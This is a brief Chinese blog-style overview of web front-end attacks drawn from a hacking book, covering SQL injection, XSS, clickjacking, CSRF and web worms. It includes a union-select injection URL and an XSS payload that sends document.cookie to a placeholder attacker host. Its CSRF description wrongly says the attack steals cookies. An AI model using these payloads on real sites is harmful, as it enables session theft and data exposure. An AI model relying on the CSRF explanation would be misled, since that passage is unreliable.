看了一本书《Web前端黑客技术揭秘》,讲了很多的前端安全性问题,这里总结下常见的!不是挨个讲解,只是讲一下概念。
1、SQL注入攻击
一个例子说明一切:
访问:http://www.demo.com/demo.php?id=1
=> select * from user_table where id=1
访问:http://www.demo.com/demo.php?id=1 union select * from user_table
=> select * from user_table where id=1 union select * from user_table.
2、XSS跨站脚本攻击
举个例子:
访问:http://www.demo.com/demo.php#document.write("<script/src=www.attack.com/alert.js></script>");
alert.js
new Image().src="http://www.attack.com/steal.php?data="+escape(document.cookie);
就是为了获取珍贵的Cookie,还要注意HttpOnly cookie 的溢出泄露。
3、前端页面劫持
分点击劫持、拖放劫持、触屏劫持三种。
这个道理也很简单,就是讲一个需要用户点击或其他操作的页面使用iframe标签引到当前页面,但是其余部分都被遮挡住,然后只暴露出需要用户点击或其他操作的部分,并且引导用户进行操作。从而获得用户客户端的各种数据,利用数据完成一些操作。
4、CSRF跨站请求伪造
CSPR攻击和XSS攻击的不同之处在于它是要用户到一个黑客构建好的攻击网站上,从而被获得Cookie。
5、Web蠕虫问题
蠕虫程序就是利用Web2.0用户只交的交流这一个特点做的。
经典例子:某人发表了一个东西,如果另一个用户发现并点开了。这个蠕虫程序便使用点击人的信息再次发送一条相同信息,依次扩展,指数增长!
用处:对用数据进行恶意操作,拒绝服务攻击,分布式拒绝服务攻击,散播广告,散播网页木马,传播舆情等。
其他:注意同源策略,网络上的信任与不信任,社会工程学的应用。